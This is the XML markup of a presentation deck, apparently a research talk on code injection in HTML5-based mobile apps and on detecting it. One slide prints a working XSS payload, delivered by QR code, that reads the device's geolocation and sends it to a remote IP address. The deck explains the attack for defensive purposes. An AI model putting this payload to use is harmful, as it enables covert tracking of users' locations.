          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="210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Condition 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="210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(Vulnerable API:html)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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Achieving Damage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="360" name="image3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3958" y="1385887"/>
            <a:ext cx="3678043" cy="363702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3" name="Group 363"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1104970" y="4262720"/>
            <a:ext cx="219819" cy="284451"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="219818" cy="284450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="361" name="Shape 361"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2" y="45510"/>
              <a:ext cx="219819" cy="193435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>
              <a:off x="-2" y="0"/>
              <a:ext cx="219819" cy="2844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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr>
                  <a:solidFill>
                    <a:srgbClr val="FF0000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366" name="Group 366"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2623070" y="1721742"/>
            <a:ext cx="219819" cy="284451"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="219818" cy="284450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="364" name="Shape 364"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2" y="45510"/>
              <a:ext cx="219819" cy="193435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-2" y="0"/>
              <a:ext cx="219819" cy="2844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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr>
                  <a:solidFill>
                    <a:srgbClr val="FF0000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369" name="Group 369"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3308867" y="3620882"/>
            <a:ext cx="219819" cy="284451"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="219818" cy="284450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="367" name="Shape 367"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2" y="45510"/>
              <a:ext cx="219819" cy="193435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>
              <a:off x="-2" y="0"/>
              <a:ext cx="219819" cy="2844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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr>
                  <a:solidFill>
                    <a:srgbClr val="FF0000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372" name="Group 372"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5008750" y="2120542"/>
            <a:ext cx="3468976" cy="2015043"/>
            <a:chOff x="-1" y="-1"/>
            <a:chExt cx="3468975" cy="2015042"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="370" name="Shape 370"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2" y="-2"/>
              <a:ext cx="3468976" cy="2015044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>
              <a:off x="-2" y="63205"/>
              <a:ext cx="3468976" cy="18886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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="1047475" lvl="0" indent="-1041125">
                <a:buClr>
                  <a:srgbClr val="FF0000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Arial"/>
                <a:buAutoNum type="arabicPeriod"/>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="21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Directly Attack System Resources </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="1047475" lvl="0" indent="-1041125">
                <a:buClr>
                  <a:srgbClr val="FF0000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Arial"/>
                <a:buAutoNum type="arabicPeriod"/>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="21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Propagate to other Apps </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="1047475" lvl="0" indent="-1041125">
                <a:buClr>
                  <a:srgbClr val="FF0000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Arial"/>
                <a:buAutoNum type="arabicPeriod"/>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="21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Propagate to other Devices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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Real Vulnerable App Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="375" name="image2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2919" y="2024427"/>
            <a:ext cx="1428751" cy="1428751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 376"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769558" y="3626206"/>
            <a:ext cx="1755471" cy="297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 anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1500"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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500"/>
              <a:t>Malicious QR code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Shape 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046750" y="4370668"/>
            <a:ext cx="2619534" cy="525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 anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1500"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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500"/>
              <a:t>Vulnerable App (Android, iOS, Windows Phone)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="378" name="image3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39936" y="1586850"/>
            <a:ext cx="1838733" cy="2669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image3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56935" y="1571434"/>
            <a:ext cx="1736178" cy="2700716"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Shape 380"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6253031" y="4484968"/>
            <a:ext cx="1543990" cy="297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 anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1500"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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500"/>
              <a:t>Being Traced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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Real Vulnerable App Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Shape 383"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1451371"/>
            <a:ext cx="8229601" cy="3292082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="34275" tIns="34275" rIns="34275" bIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" b="1" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>The malicious code injected in the QR code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" i="1">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>&lt;img src=x onerror=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>      navigator.geolocation.watchPosition(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>      function(loc){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>      m=’Latitude:’+loc.coords.latitude+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>      ’\n’+’Longitude:’+loc.coords.longitude;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>      alert(m);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>      b=document.createElement(’img’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>      b.src=’http://128.***.213.66:5556?c=’+m })&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Shape 384"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3792680" y="1993040"/>
            <a:ext cx="1131592" cy="235670"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="125092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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="387" name="Group 387"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4924267" y="1766354"/>
            <a:ext cx="2799422" cy="627351"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2799421" cy="627349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="385" name="Shape 385"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="64549"/>
              <a:ext cx="2799422" cy="498261"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="14519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-1" y="0"/>
              <a:ext cx="2799422" cy="6273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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr sz="1800">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0"/>
              <a:r>
                <a:t>Use HTML5 Geolocation API to get Location </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Shape 388"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1564597" y="3063544"/>
            <a:ext cx="3359673" cy="296090"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="125092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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="391" name="Group 391"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4924267" y="2697557"/>
            <a:ext cx="2799422" cy="627350"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="2799421" cy="627349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="389" name="Shape 389"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="24749"/>
              <a:ext cx="2799422" cy="577859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="14519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-1" y="-2"/>
              <a:ext cx="2799422" cy="6273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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr sz="1800">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0"/>
              <a:r>
                <a:t>Alert location information for demonstration purpose</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Shape 392"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753252" y="3492520"/>
            <a:ext cx="3249123" cy="505922"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="145191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pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Shape 393"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4002373" y="3687357"/>
            <a:ext cx="921896" cy="65124"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="125092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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="396" name="Group 396"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4924264" y="3445708"/>
            <a:ext cx="3191041" cy="627351"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3191040" cy="627349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="394" name="Shape 394"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="33945"/>
              <a:ext cx="3191041" cy="559468"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="14519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-1" y="-1"/>
              <a:ext cx="3191041" cy="6273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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr algn="ctr">
                <a:defRPr sz="1800">
                  <a:latin typeface="Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0"/>
              <a:r>
                <a:t>Real damage, send  location information to remote server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Shape 397"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753254" y="3211589"/>
            <a:ext cx="811349" cy="235001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="145191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pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Shape 398"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753252" y="2104437"/>
            <a:ext cx="3039431" cy="234123"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="145191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pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Shape 399"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1158899" y="1894102"/>
            <a:ext cx="531083" cy="185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FF0000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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380023" y="2252906"/>
            <a:ext cx="8616462" cy="85725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2" defTabSz="694944">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="28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rPr>
              <a:t>Detection of Code Injection Attacks on HTML5-based Mobile App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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="528637"/>
            <a:ext cx="8229601" cy="8572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8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4617B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Challenges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Shape 404"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1451371"/>
            <a:ext cx="8229601" cy="3292082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="34275" tIns="34275" rIns="34275" bIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="114300">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pP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49914" lvl="0" indent="-456264">
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>C1: Mixture of application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>         and framework code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="114300">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pP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49914" lvl="0" indent="-456264">
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>C2: Difficulties in static  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>          analysis on JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="114300">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pP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49914" lvl="0" indent="-456264">
              <a:buSzPct val="95000"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>C3: Dynamic loaded content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="407" name="Group 407"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4022896" y="665761"/>
            <a:ext cx="4901470" cy="4161413"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4901468" cy="4161411"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="405" name="Shape 405"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="4901470" cy="3973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682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9525" cap="flat">
              <a:solidFill>
                <a:srgbClr val="125092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0000FF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pPr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>
              <a:off x="-1" y="143161"/>
              <a:ext cx="4570342" cy="40182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75" tIns="34275" rIns="34275" bIns="34275" numCol="1" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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&lt;html&gt;</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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 &lt;head&gt;</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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   &lt;script src= www.example.com/load.js/&gt;</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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 &lt;/head&gt;</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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 &lt;body&gt;</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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    &lt;script&gt;</a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="0000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           document.addEventListener("deviceready",   </a:t>
              </a:r>
              <a:endParaRPr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>
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
